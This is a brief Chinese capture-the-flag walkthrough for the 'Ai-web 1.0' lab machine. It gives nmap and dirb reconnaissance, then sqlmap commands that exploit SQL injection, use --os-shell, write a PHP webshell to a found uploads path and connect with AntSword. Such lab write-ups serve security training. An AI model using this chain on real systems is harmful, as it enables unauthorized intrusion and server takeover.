Ai-web 1.0通关攻略

1.主机探测

nmap 192.168.182.1/24

扫描到：192.168.182.167

2.目录扫描

dirb http://192.168.182.167/

+ http://192.168.182.167/index.html                                                           
+ http://192.168.182.167/robots.txt

发现txt文件打开

3.拼接发现的路径

扫描到了一个info.php

访问后发现了网站的绝对路径

4.判断是否存在注入

用dirb扫描另一个路径

发现index.php文件，浏览器访问

发现登录框，输入1抓包

用工具sqlmap扫描

sqlmap -u 'http://192.168.182.167/se3reTdir777#' --data='uid=1&Operation=Submit'

用--os-shell参数

上传一句话木马

sqlmap -u 'http://192.168.182.167/se3reTdir777#' --data='uid=1&Operation=Submit' --file-write 11.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/11.php

写入成功

蚁剑连接